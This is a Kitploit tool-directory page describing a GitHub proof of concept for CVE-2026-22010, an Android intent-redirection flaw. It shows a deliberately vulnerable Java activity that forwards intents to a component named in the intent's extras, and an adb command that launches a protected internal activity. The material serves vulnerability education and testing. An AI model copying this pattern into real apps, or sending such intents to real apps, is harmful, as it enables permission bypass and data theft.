Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Proof-of-concept for CVE-2026-22010 Android intent redirection: demonstrates an exported activity forwarding intents to attacker-controlled internal components, bypassing permission checks, with vulnerable Java code and adb exploit steps. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Android SecurityVulnerability AnalysisExploitationMobile App PentestingMobile SecurityLearning & Education
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Proof-of-concept for CVE-2026-22010 Android intent redirection: demonstrates an exported activity forwarding intents to attacker-controlled internal components, bypassing permission checks, with vulnerable Java code and adb exploit steps.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
141 month agoNot yet reviewed

CVE-2026-22010 – Android Intent Redirection to Exported Component

Program Code (Java/Android simulation)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Android Intent Redirection to Exported Component

Severity: High

Overview

An exported Android activity blindly redirects incoming intents to a component specified in the intent’s extras. An attacker can craft an intent that causes the app to launch a protected internal activity with attacker‑controlled data, bypassing permission checks.

Vulnerability Details

  • Type: Intent Redirection / Permission Bypass
  • Impact: Access to private components, data theft.
  • Root Cause: The app does not validate the target component (package and class name) before forwarding the intent.

Exploit Demonstration

Deploy the vulnerable app on an Android emulator. Send an intent via adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

The internal activity launches without proper permissions.

Download Tool